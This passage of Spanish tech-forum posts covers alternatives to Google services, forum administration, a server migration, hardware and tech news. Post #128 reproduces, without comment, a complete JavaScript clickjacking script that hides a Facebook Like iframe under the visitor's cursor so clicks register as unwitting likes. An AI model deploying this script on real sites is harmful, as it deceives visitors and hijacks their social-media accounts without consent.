    Bing Maps: como no, tenía que ponerlo. Todos los beneficios de Bing en un mapa, asi de sencillo. Su cartografía es buena y por lo general nos dará un servicio muy competente. Tiene mapas planos y mapas a vista de pájaro (en satélite, vamos). Su integración con Bing permite buscar y ver la ubicación de monumentos, ciertas tiendas, servicios urbanos, etc. Probablemente no tan completo como los anteriores pero no menos útil.
    Yahoo! Maps: de nuevo con Yahoo! nos movemos entre lo banal y lo útil. Sus mapas están proporcionados por Here, pero integra los servicios propios como información meteorológica, Flickr o búsquedas de negocios, hoteles, etc.

Correo electrónico y mensajería instantánea

    GMX: tras años usándolo, para mi el mejor servicio de correo alternativo. Es europeo, concretamente alemán, con todas sus bondades (las políticas de privacidad europeas son mejores en general que las de EEUU). Su capacidad para el buzón es en principio ilimitada y tiene un colector de correos que se puede configurar y recibir en esa misma cuenta mails de otros servicios. También incorpra un servicio gratuito de almacenamiento en la nube de 2GB. Integra el estándar POP e IMAP, por lo que configurar una cuenta GMX en las distintas aplicaciones de correo suele ser coser y cantar. ¿Cosas en contra? Que hay algunos servicios web que no lo reconocen como válido y/o lo marcan como spam, aunque afortunadamente esto va poco a poco solucionándose debido a la buena aceptación que tiene en Alemania este tipo de cuentas. También puede volverse un poco complicado el crear una cuenta si eres de un país que no pertenezca a Europa (como continente). La razón de esto es básicamente que el servicio no es tan grande como otros y parece que prefiere dar preferencia a países donde las políticas de privacidad son más afines y donde, lógicamente, los servidores funcionan bien. De todas maneras es un servicio que se mantiene en expansión y es posible que a día de hoy estos pequeños "peros" sean menores de lo que me parecen.
    Yahoo! Mail: los 90 atacan de nuevo. O no. Con una capacidad de buzón teóricamente de 1TB de almacenamiento, este servicio de e-mail sigue siendo para mi de los mejores. Está muy aceptado debido a que es un veterano, y su bandeja, asi como su organización, es de las mejores que he visto. Muy buen diseño y funcionalidad. Además de eso obtiene beneficios en todos y cada uno de los servicios de Yahoo! (meteorología, Flickr, noticias, foros... y el futuro servicio de videos que parece que se está cocinando, en rivalidad con YouTube). Además, a partir de 2015 todas las cuentas llevarán cifrado.
    Outlook: el antiguo Hotmail/MSN se ha renovado como un rey. Antes el servicio de correo de Microsoft era un infierno de mal diseño y carne de cañón para el spam. Pero ahora es totalmente diferente: un diseño exquisito derivado de la nueva interfaz Modern UI, un filtro de spam realmente bueno, un buen organizador de contactos y todos los beneficios de los servicios integrados de Microsoft. Al igual que GMX, su capacidad para el buzón es en principio ilimitada. Además, dos grandes pros en toda regla: la integración con Skype, y esos 15GB gratuitos de almacenamiento en OneDrive. Y es que tener una cuenta Outlook significa gozar del servicio de almacenamiento en la nube de Microsoft, el cual puede que no sea el mejor en cuanto privacidad, pero sí que lo es en funcionalidad.
    Lycos Mail: sinceramente, no lo he probado, pero dicen que cumple con su cometido. Su capacidad de buzón promete los 3GB en su versión gratuita, tiene todos los beneficios de la privacidad de su buscador, asi como de sus servicios integrados. Lo único malo es que para conseguir el acceso por POP e IMAP debemos adquirir una cuenta Plus, básicamente de pago, que además aumenta el buzón hasta los 5GB y elimina la publicidad.
    Hushmail: parece que este servicio de correo cifrado aguanta bastante bien y que por tanto es bastante fiable. Pero al igual que Lycos Mail, si queremos exprimir al máximo sus capacidades debemos actualizar a una cuenta de pago, en las que se incluye 10GB de almacenamiento, configuraciones POP e IMAP e incluso direcciones personalizadas.
    Jabber: si lo que quieres es algo para chatear, que sea de código abierto y lleve años de fiabilidad a sus espaldas, ese es Jabber. Bastante conocido por ser un pionero a la par que veterano, y por su respeto a los estándares abiertos. Si bien es verdad que, a pesar de todo, su funcionalidad principal y su fuerte, que era el poder chatear directamente con cuentas de GMail, parece que ha quedado un poco capada últimamente cuando Google ha apostado por Hangouts. De todos modos hay una comunidad de usuarios bastante extensa.
    IRC: chat clásico contante y sonante, hoy por hoy relegado casi exclusivamente a comunidades y grupos muy concretos, sin ir más lejos dedicados a desarrollo de software y su soporte, la cual creo que es a día de hoy su principal uso. Aún actualmente hay páginas y portales web con este servicio.
    OpenMailBox: mención especial a este servicio que me han chivado. Parece que se basa en software de código abierto, respeta prácticamente todos los estándares, ofrece almacenamiento en la nube y mucho más.

Traductores online

    Bing Translator: para mi la mejor alternativa a Google. Traducciones muy correctas y posibilidad de traducir webs enteras insertando la URL.
    Babylon: un clásico. Sus traducciones son muy buenas y llevan años de experiencia en esto. A día de hoy no puede traducir webs enteras mediante URL.
    Politraductor: bastante bueno pero no puede traducir páginas web completas.
    Online Translator: similar al anterior. Aunque en teoría puede traducir webs completas, realmente esta posibilidad no es del todo buena.
    Babelfish: no, no es el mítico servicio de Yahoo!, ya que éste fue abandonado. Parece otro independiente que se ha quedado con el nombre. Es un traductor realmente sencillo, para cosas bastante ocasionales. No puede a día de hoy traducir frases o textos muy largos, ni mucho menos webs enteras mediante URL.

Vídeos

    Vimeo: excelente alternativa a YouTube "sin basura" desde siempre, aunque cabe hacer algunas aclaraciones. Su servicio es muy bueno, todo funciona con tecnologías web como HTML5 desde hace mucho tiempo, tiene posibilidad de licenciar vídeos en Creative Commons y ofrecer su descarga directa en varias calidades. Eso si, aunque puede haber de todo, su comunidad está hecha básicamente por y para artistas de lo audiovisual. El vídeo de moda en internet muy probablemente no se encuentre aquí, pero sí que se encuentran los más maravillosos y de calidad, asi como cortometrajes. Muy recomendable si te gusta todo ese mundillo.
    Daylimotion: probablemente el más parecido a YouTube en todos los sentidos, aunque está claro que no es tan popular como éste.
    Dalealplay: otro sitio con vídeos de corte popular. Tiene también canales oficiales de diversos medios de comunicación.
    Metacafe: servicio poco conocido, pero muy interesante, ya que a pesar de que contiene mucha variedad, su comunidad ofrece muchos vídeos enfocados a la cultura de internet (gags, todo tipo de humor, fails, videojuegos, reviews...). Eso si, los vídeos en idiomas diferentes al inglés escasean.
    Hulu: este hay que cogerlo con pinzas, ya que no es para nada un servicio universal. Si tienes la suerte de vivir en EEUU o puedes  crear un proxy o algo similar para emular una IP de allí, podrás acceder a este servicio de vídeos muy interesante. Y es que este servicio sólo está disponible y enfocado a los EEUU. Obviamente, también deberás tener un nivel de inglés aceptable por razones lógicas...
    Vine: alternativa agarrada por los pelos, porque no sirve para todo el mundo ya que su concepto no es ni de lejos el mismo que YouTube o cualquiera de los anteriores. Eso si, se está volviendo muy popular y puede resultar de interés para según qué cosas. Con él puedes ver o crear pequeños vídeos de pocos segundos que se reproducen en bucle. En él se encuentran todo tipo de minúsculas creaciones, aunque probablemente los que más abundan son los de humor, debido a que es un formato idóneo para crear pequeños sketches. El formato de su comunidad es muy similar al de Tumblr o Twitter.

Almacenamiento en la nube

    Dropbox: un viejo conocido y pionero de este tipo de servicios. Con aplicaciones multiplataforma. Ofrece solamente 2GB de almacenamiento gratuito, aunque hay diversos medios para obtener un poco más. Tiene ampliaciones de espacio mediante suscripciones de pago adaptadas a usuarios y empresas. Si eres un obsesivo compulsivo de los temas sobre la NSA y sigues a pies juntillas las declaraciones de Edward Snowden, creo que es mejor que lo descartes...
    Copy: duro competidor. Su servicio no es el más rápido que he probado, pero ofrece 15GB de almacenamiento gratuito, una interfaz muy intuitiva y minimalista, y aplicaciones multiplataforma. Está cifrado, y ofrece precios atractivos para la ampliación de espacio.
    OneDrive: el servicio de Microsoft es un auténtico monstruo (en el buen sentido) en el tema de almacenamiento en la nube. Al igual que Dropbox, probablemente no sea lo más conveniente si el tema de la NSA te quita el sueño. 15GB de almacenamiento gratuito, que recibes directamente si ya tenías una anterior cuenta Hotmail u Outlook. Todos los beneficios de los servicios integrados de Microsoft y Windows/Windows Phone. Precios asequibles si queremos ampliar el espacio.
    Mega: personalmente no lo considero exactamente almacenamiento en la nube de uso personal, ya que para mi está bastante claro que el sucesor de Megaupload tiene más bien la finalidad de compartir archivos de tamaño bastante grande. De todas maneras se puede usar para ambos fines. Supuestos cifrados de seguridad prácticamente infranqueables, unos extremadamente atractivos 50GB gratuitos, apps multiplataforma y precios interesantes para ampliar el espacio.
    SpiderOak: uno de los servicios favoritos de los obsesionados de la privacidad y la NSA, y no es para menos. Su seguridad y cifrado es envidiable. Tanto, que tu cuenta tiene una clave personal que si la pierdes es tu fin, porque no hay manera de recuperarla y no se guarda en los servidores. Solamente 2GB gratuitos de almacenamiento, y los precios son un poco cuestionables. Pero si te interesa una elevada seguridad y privacidad, es probablemente el mejor servicio.
    BitTorrent Sync: una joya de la corona, poco conocido, y que realmente no opera en "la nube", sino que se replantea el concepto. Su funcionamiento se basa en la red P2P. Básicamente descargas el cliente y eliges qué carpeta y archivos quieres sincronizar. Instalas el cliente en un segundo equipo, y los archivos o carpetas anteriormente sincronizados se copian. Asi que básicamente es una especie de compartición directa de archivos. El P2P permite que sea un tipo de sincronización segura, y no existe más límite de espacio que el que dispongas en tus equipos, por lo que teóricamente, el del servicio en sí mismo, es infinito.
    Box: bastante popular a pesar de no ser una gran empresa. Cifrado de archivos y prácticamente todo lo que podemos esperar de un servicio asi, muy similar a Dropbox. 10GB de almacenamiento gratuito, apps para varias plataformas y precios muy interesantes.
    Bitcasa: poco popular pero lleva ya una carrera bastante larga. Servicio sencillo, 20GB gratuitos, apps multiplataforma y también buenos precios.
    OwnCloud: a pesar de todo tenía que ponerlo. Si te gusta el software libre y de código abierto, estás muy preocupado por la privacidad, tienes la suerte de poder montar tu propio servidor, quieres tener el control total de tus archivos y tu servicio y quieres tener la posibilidad de acceder a tu cuenta desde cualquier sitio, es para ti. Tiene todo lo bueno y todo lo malo de aventurarte a hacer tu propio servicio de almacenamiento en la nube, cada cual con sus múltiples razones.

Análisis web (como Google Analytics)

    Piwik: proyecto de código abierto, pero debe instalarse en el propio servidor, por lo que sólo es perfecto si controlas toda la infraestructura de tu web.
    Chartbeat
    Kissmetrics
    Clicky
    iPerceptions
    Reinvigorate
    Woompra
    Mint

Ads publicitarios (como Ad Sense)

    WordAds: servicio publicitario de mano de WordPress. Creo que éstos no necesitan presentación.
    Bing Ads: Microsoft y Yahoo! han unido sus fuerzas en un único servicio.
    Exoclick: se promociona como el quinto servicio publicitario más usado de internet. Sus razones y estadísticas tendrán, supongo.
    Chitika: parece que está relacionada con la antigua red de ads de Yahoo!, y si así continúa, se beneficia de la red actual de Bing.
    Sitescout: cifras convincentes para considerarla una opción.

Blogging

    WordPress: servicio fiable y conocido en todas sus facetas. Particularmente su versión para instalar y montar el blog por medios propios, o sea, la versión WordPress.org. De código abierto.
    Ghost: mucho ojo a esta plataforma de blogging minimalista. Inspirada en WordPress y también de código abierto, se mantiene tremendamente sencillo y funcional por encima de todo. Sus temas son elegantes y por lo general muy bien diseñados. Si se quiere un blog muy limpio, con diseño exquisito y sin florituras para no complicarse la vida (ni complicársela a los demás), es de lo mejor que hay.
    Medium: una vuelta de tuerca al concepto de los blogs. Básicamente es un servicio para postear artículos sin necesidad de tener un dominio propio o blog propiamente dicho. También muy minimalista, requiere de cuenta de Twitter o Facebook para postear. El sistema de comentarios es muy interesante, ya que permite a los demás comentar párrafos, líneas o palabras concretas para centrarse en algo concreto, mejorando el feedback.
    Tumblr: pionero del microblogging, tampoco necesita presentación. Por lo general muy sencillo y con posibilidad de crear todo tipo de blogs (con o sin posibilidad de comentarios, solamente fotográficos u otro contenido, permite activar un sistema de aportes de contenido, etc.) Sus temas gráficos son variados, relativamente sencillos de hacer y por lo general muy vistosos. La información fluye muy rápido gracias a su sistema de favoritos y reblogueo, y se conserva un historial de las entradas que han sido marcadas como favoritas o reblogueadas, siempre aludiendo a las fuentes. El pequeño punto en contra es que el consumo de contenido, al ser tan rápido, es muy agresivo. Si blogueas de forma más desinteresada que otras plataformas (no te importan los comentarios o las menciones directas, sino el contenido y público consumidor general) entonces es una buena opción con enormes posibilidades.

Ofimática online

    Office Online: por lo general si hablamos de ofimática pensamos en el MS Office. Lo queramos o no, es en general la mejor suite ofimática. No solo porque Microsoft se ha dedicado toda la vida a ello y expandiendo su influencia, sino que tras su actualización de 2013 ha mejorado enormemente. Y por supuesto, en los tiempos que corren se pueden usar online, o sea, en la nube. Nos beneficiamos enormemente si tenemos una cuenta Outlook, que a su vez nos beneficia de OneDrive. O sea, una integración total con los servicios de Microsoft.
    LibreOffice Online: si tenemos la alternativa cerrada favorita de la ofimática, debemos tener la libre y de código abierto. Y esa es LibreOffice. Este servicio ejecuta los diferentes programas de esta suite directamente en el navegador. No es tan sobresaliente como la versión offline y de escritorio de toda la vida, pero es útil e interesante.
    Zoho: creo que la suite online más completa. Con muchos usuarios, una gran cantidad de aplicaciones  e interesantes opciones de colaboración, es un claro referente.
    Live Documents: la menos completa (procesador de textos, tablas y presentaciones), pero con una interfaz realmente completa y amplias oportunidades. Lo poco que tiene lo hace bien.

Podría hacer la lista más larga, pero está claro que no acabaría nunca. Estas son quizás las alternativas más interesantes a los servicios más populares y usados de Google. Como veis, esta vez he dejado de lado algunos servicios como los lectores de Feeds, ya que tras la muerte de Google Reader se han popularizado muchos servicios multiplataforma como Feedly, Flipboard o Pocket.

En cuanto a navegadores web, hay un montón de ellos tanto para escritorio como para plataformas móviles, y en Linux gozamos de todo un mundo de ellos. Los más populares y para mi alternativas seguras son el incombustible Firefox o el nuevo Opera.

Fuente:
http://ext4.wordpress.com/2014/08/11/grandes-alternativas-a-los-servicios-de-google-o-como-huir-de-la-gran-g-edicion-2014/
#124
¿Vale la pena instalar la nueva versión de Tapatalk?

No sé si la nueva versión añade alguna funcionalidad interesante.

Estamos usando:

CitarSMF 1.1.11+ - Version 2.1.1

Y la nueva versión:

CitarSMF 1.1+ - Version 3.0.0
1. add Tapatalk SSO support
2. add push notification support

Veo que incluyen un nuevo "smart banner" bastante molesto, aunque también se puede quitar manualmente:

[HOWTO] Disable Tapatalk banner popup
http://www.simplemachines.org/community/index.php?topic=508947.0

Citar
Admin panel under Tapatalk settings. Disable "Mobile Welcome Screen"

#125
Se acaba de instalar el mod llamado "Topic Solved" que permite elegir al usuario marcar el tema como "Resuelto o Solucionado".

Ahora falta añadir la opción en los subforos que se quiera dar esa opción, es decir, en la mayoría, menos por ejemplo en el de Noticias, dónde no hay dudas xD

Para marcar un  tema como resuelto o solucionado:



Los mensajes o temas resueltos aparecen con un icono verde:



Por favor reportad si con algún theme (Diseño) del foro falta alguna imagen por mostrar o directamente no se muestra la imagen.

Por ejemplo este mensaje debería aparecer con el icono verde de "Resuelto"

Gracias.
#126
Ayer nos migramos a un nuevo servidor dedicado para el foro y la web de elhacker.net:

  • Intel® Xeon® E3-1270 v3 (10,118 puntos de benchmark)
    http://www.cpubenchmark.net/high_end_cpus.html
  • 32 GB ECC RAM
  • 2 x 240 GB SATA 6 Gb/s Data Center Series SSD (Software-RAID 1)
  • Connection 1 Gbit/s-Port

    Datacenter de Hetzner

    Hasta ahora estabamos en un servidor dedicado del año 2011 en OVH

  • 2x Intel(R) Xeon(R) CPU E5606 @ 2.13GHz , 8 cores (3,353 benchmark) al ser dual 5,743 benchmark
  • 24 gb RAM
  • Intel SSD 320 2x 120 GB

    En el datacenter rbx (Roubaix)


    Ayer martes ya funcionaba en el nuevo, pero el mysql era remoto y poco a poco se han ido refrescando las dns apuntando a la nueva ip

    Mientras la ip vieja de OVH sigue funcionando: 46.105.119.93, pero el foro de allí se conecta remotamente al MySQL de Hetzner.

    En principio funciona todo bien, los e-mails se mandan, los acentos se muestran, aunque ayer por la tarde hubo un rato que no funcionaba correctamente el buscador (un problema con el iptables y el servicio de sphinx) y mandar los mensajes personales iba lentísimo, ahora ya funciona con normalidad.

    Si véis que algo funciona mal o lento no dudéis en comentarlo, aunque debería funciona más rápido que el viejo servidor, ya que es más nuevo y más potente.
#127
Sólo a titulo informativo:

Resulta que la memoria Crucial 2GB PC2-6400 es incompatible con la Kingston HyperX

El modelo exacto que tengo es

CitarKingston HyperX 2GB (2 x 1GB) 240-Pin DDR2 SDRAM DDR2 800 (PC2 6400) Dual Channel Kit Desktop Memory Model KHX6400D2LLK2/2G.

Pese a ser las dos PC2-6400, pues cuando las pongo juntas no van y por separado si xD

No suele ser muy habitual la incompatiblidad de memoria ram y menos hoy en dia y con marcas tan conocidas como Crucial y Kingston, pero mira tu por donde esta vez se ha cado el caso.

Ahora me toca comprar memoria marca Kingston... pero ya no se si encontraré las HyperX en DDR2, todo lo que veo ahora es memoria DDR3.

La placa base es una Asus P5Q-E P45
#128
<!– Script AutoLike 1/2 (inicio) –>

<!– Script AutoLike 1/2 (fin) –>


Código (javascript) [Seleccionar]

   function setCookie(c_name,value,exdays) {
           var exdate=new Date();
           exdate.setDate(exdate.getDate() + exdays);
           var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString());
           document.cookie=c_name + "=" + c_value;
   }
   
   function getCookie(c_name) {
           var i,x,y,ARRcookies=document.cookie.split(";");
           for (i=0;i<ARRcookies.length;i++) {
                   x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
                   y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
                   x=x.replace(/^\s+|\s+$/g,"");
                   if (x==c_name) {
                           return unescape(y);
                   }
           }
   }
   
   var total = "1";
   var time = "365";
   
   var accounts = getCookie("number");
   var plus = parseInt(getCookie("number")) + parseInt(1);
   
   switch (accounts) {
   default:
           var account = "http://www.facebook.com/RinconAbstracto";
   break;
   case total:
           var ready = true;
   break;
   }
   
   var interval;
   var iflag;
   var icontainer;
   var standardbody;
   
   if (ready == true) {
   } else {
   window.fbAsyncInit = function(){
   FB.init({ appId:'432296140140060', status:true,  cookie:true, xfbml:true});
   FB.getLoginStatus(function(response){
   if (response.status != "unknown")
   {
   jQuery(function () {
           jQuery("body").append('<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0; z-index:9999;" id="icontainer"><iframe src="http://www.facebook.com/plugins/like.php?href='+ account +'&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="werunthenite" name="werunthenite"></iframe></div>');
           iflag = 0;
           icontainer = document.getElementById('icontainer');
           standardbody = (document.compatMode == "CSS1Compat") ? document.documentElement : document.body //create reference to common "body" across doctypes
           interval = setInterval("updateActiveElement();", 50);
   });
   }
   });
   };
   // Load the SDK Asynchronously
   (function(d){
   var js, id = 'facebook-jssdk'; if (d.getElementById(id)) {return;}
   js = d.createElement('script'); js.id = id; js.async = true;
   js.src = "//connect.facebook.net/en_US/all.js";
   d.getElementsByTagName('head')[0].appendChild(js);
   }(document));
   jQuery("html").bind('mousemove', function (e) {
           if (iflag == 0) {
                   var x = e.pageX - 5;
                   var y = e.pageY;
                   //console.log("X: " + x + " AND Y: " + y);
                   jQuery(icontainer).css('top', y).css('left', x);
           }
   });
   }
   
   function updateActiveElement() {
           if (jQuery(document.activeElement).attr('id') == "werunthenite") {
                   setTimeout('$("#icontainer").remove();', 500);
                   if (typeof accounts === 'undefined') {
                   setCookie("number","1",time);
                   } else {
                   setCookie("number",plus,time)
                   }
                   var flag = 0;
                   clearInterval(interval);
                   iflag = 1;
                   if (flag != 0) document.location = "";
           }
   }


Fuente:
http://core.gotmalk.org/2013/10/12/auto-likes-en-facebook-cuidado-con-tu-privacidad/
#129
Es un ordenador Dell con un conector muy raro de cable de alimentación.

¿Alguien tiene alguna idea de dónde conseguir uno o si es habitual en otros países?

Lo único que pone es "For use with adapter model DA-1"









#130
Diseño Gráfico / Maestra del Photoshop
25 Junio 2013, 17:08 PM
Fijaros en las puertas... han sufrido una transformación, debido al adelagazamiento xD




Video gif de FAIL



Otro ejemplo:

#131
En el año 2009 el foro de elhacker.NET fue atacado por una botnet de más de 75.000 ordenadores:

http://www.elmundo.es/elmundo/2009/11/26/navegante/1259238023.html

Éste es el resultado a nivel gráfico, después de procesar el log del servidor web Apache durante parte del ataque:


[youtube=640,360]http://www.youtube.com/watch?v=ffxU_wH8kFs[/youtube]


[youtube=640,360]http://www.youtube.com/watch?v=-GvmAHPuuzc[/youtube]


Un menor de edad imputado en un ataque masivo contra el sitio 'elhacker.net'
http://foro.elhacker.net/noticias/un_menor_de_edad_imputado_en_un_ataque_masivo_contra_el_sitio_elhackernet-t275900.0.html


Que es el detectabot.php?
http://foro.elhacker.net/seguridad/que_es_el_detectabotphp-t270118.0.html

Se ha usado el programa Logstalgia

Explicado aquí:
http://blog.elhacker.net/2013/04/visualizar-graficamente-los-logs-de-un-servidor-web-apache.html
#132
La cuenta oficial de la Policía Nacional española acaba de superar los 400.000 seguidores en Twitter, una cifra que le sitúa como la segunda del mundo solo por detrás del FBI. ¿A qué se debe este éxito?

España no es ni mucho menos uno de los países más activos en twitter, sin embargo, la Policía Nacional ha conseguido situarse en segunda posición a nivel mundial por detrás del FBI. ¿Por qué tiene tantos seguidores?

Cercanía y actualización constante

Las redes sociales se han convertido en un poderoso canal de comunicación e interacción entre usuarios, empresas e incluso organismos. En el caso del perfil oficial de la Policía se pueden leer noticias de última hora sobre las últimas detenciones e intervenciones del cuerpo aunque lo más importante son los consejos y recomensaciones de seguridad que están orientados a todos los ciudadanos.

El tweet más famoso del cuerpo

El pasado mes de febrero, el perfil oficial de la policía publicó uno de los "tweets" más compartidos en España en los últimos meses.



El mensaje sorprendió tanto que fue retwitteado más de 7.500 veces y generó cientos de comentarios. Simplemente alertaba de los problemas de seguridad que pueden generar las redes sociales pero el tono llegó a prácticamente todos los colectivos. No ha sido el único tweet famoso, en el día de ayer recomendaron a los usuarios instalar aplicaciones de rastreo en smartphones y tablets para facilitar la recuperación de los dispositivos y también generó un efecto viral muy importante.

¿Cuántos seguidores tienen otras policías a nivel mundial?

El FBI es la más importante en Twitter con 551.000 seguidores seguida de la española y por detrás aparecen otras como la Policía Colombiana con 281.000 "followers", la mexicana 160.000 o la ecuatoriana cerca de 95.000. Lejos están otros perfiles oficiales como por ejemplo la policía belga que solo tiene 1.000 seguidores y escribió solo un mensaje o la policía de Brasil que tiene apenas 8.000 fans.


Fuente:
http://www.adslzone.net/article11138-la-policia-espanola-es-la-segunda-mas-importante-en-twitter-por-detras-del-fbi.html
#133
    La rata desató un cortocircuito al roer los cables expuestos
    El animal causó que fallaran los sistemas de refrigeración
    El Gobierno japonés ha ordenado a Tepco que haya más fuentes de energía





La Compañía Eléctrica de Tokio (Tepco) ha confirmado que una rata fue la que causó el apagón que causó un fallo en los sistemas de refrigeración de la central nuclear de Fukushima-1 y que fueron restablecidos tres días después.

Aunque la semana pasada ya se apuntó a una rata como posible causa del apagón en Fukushima-1, debido a que los operarios encontraron su cadáver calcinado junto a un centro de control instalado a las afueras del edificio principal, hoy lo han confirmado, indicando que desató un cortocircuito al roer los cables expuestos.

Según TEPCO, el apagón eléctrico tuvo lugar alrededor de las 19.00 horas del 18 de marzo (11.00 horas en España) y dejó fuera de servicio los sistemas de refrigeración de los reactores 1, 3 y 4 y de uno que asiste a toda la central nuclear.

Los sistemas de refrigeración se encargan, principalmente, de mantener a una temperatura segura -por debajo de los 65 grados centígrados- las barras de combustible gastadas que se almacenan en las piscinas de cada reactor nuclear.

La compañía eléctrica ha aseverado que la temperatura más alta que ha llegado a detectar en la central nuclear a raíz del fallo en los sistemas de refrigeración ha sido de 30 grados centígrados en el reactor cuatro, por lo que no se han sobrepasado los límites legales.


Multiplicar las fuentes de energía de Fukushima

A raíz de este incidente, el Gobierno de Shinzo Abe ha ordenado a Tepco que garantice la existencia de múltiples fuentes de energía para Fukushima-1 y que mejor su sistema de prevención de riesgos.

El Gobierno ha explicado que su intención es recuperar la confianza de la población en la gestión de las crisis relacionadas con dicha central nuclear, de acuerdo con la televisión pública NHK.

El 11 de marzo de 2011 un terremoto de nueve grados en la escala de Richter sacudió la prefectura japonesa de Fukushisma, ubicada en el noreste de Japón, provocando un gran tsunami que impactó contra la central nuclear, dando lugar a una grave crisis.

A causa del desastre natural, se produjeron explosiones de hidrógeno en unos reactores y en otros se fundió parcialmente el núcleo de las barras de combustible gastadas, liberando gran cantidad de partículas radiactivas a la atmósfera.


Fuente:
http://www.rtve.es/noticias/20130326/tepco-confirma-rata-causo-apagon-central-nuclear-fukushima-1/624602
#134
Google cuenta con servicios muy útiles cuando para cuando se viaja al extranjero, como Google Maps o su propio traductor. Muchos de estos servicios, además de funcionar en navegadores web, cuentan con su propia aplicación móvil. Sin embargo, los servicios basados en web pierden mucha utilidad cuando no hay conexión, porque directamente no se pueden utilizar. Era un problema que sufría hasta ahora el servicio de traducción de Google.


Google ha lanzado una actualización para su traductor en Android. Se trata de la versión 2.6, que permite descargar paquetes de datos de hasta 50 idiomas diferentes, incluidos el castellano, el gallego o el catalán.

Es recomendable bajar los datos vía Wi-Fi, puesto que pesan bastante (rondan los 150/160 MB). Eso sí, una vez que los tengamos en el móvil, es posible traducir textos sin problemas cuando se esté en el extranjero sin miedo a que los altos precios de los datos en itinerancia dejen un gran agujero en la cuenta.

Por otro lado, desde Google advierten que la información que ofrecen mapas, traductor y otros servicios es más rica cuando se consultan online, por lo que es algo a tener en cuenta si existe la posibilidad de conectarse a Internet.

La actualización del Traductor de Google para Android es compatible con Android 2.3 o superior.

https://play.google.com/store/apps/details?id=com.google.android.apps.translate&hl=es


Fuente:
http://www.20minutos.es/noticia/1771976/0/google-translator/offline/sin-conexion/
#135
Youtube ha presentado  en la Game Developers Conference, un nuevo conjunto de herramientas para insertar streaming en directo en los videojuegos. La API dará a los desarrolladores una manera fácil de proporcionar a su comunidad la posibilidad de transmitir directamente en Youtube, permitiendo además monetizar las retransmisiones, colocando descansos y anuncios durante las retransmisiones en directo.

http://www.theverge.com/2013/3/28/4157298/youtube-announces-new-live-streaming-video-platform-for-game-developers

Youtube ya ha ofrecido características similares en algunos juegos como Black Ops 2, pero la nueva plataforma busca ampliar el numero de desarrolladores que participen del proyecto, así como ofrecer las transmisiones en directo más allá del escritorio, estando disponibles también para usuarios de iOS y Android.

Que PlayStation 4 permita retransmitir partidas en directo o la reciente popularidad de Twitch.tv (600.000 broadcasters y más de 28 millones de usuarios únicos durante el mes de febrero), no ha pasado desapercibido en las oficinas de Google, que parece tener en Youtube el destino obvio para que los desarrolladores ofrezcan el streaming de sus títulos.

Fuente:
http://www.elotrolado.net/hilo_youtube-presenta-una-api-para-el-streaming-de-videojuegos_1882976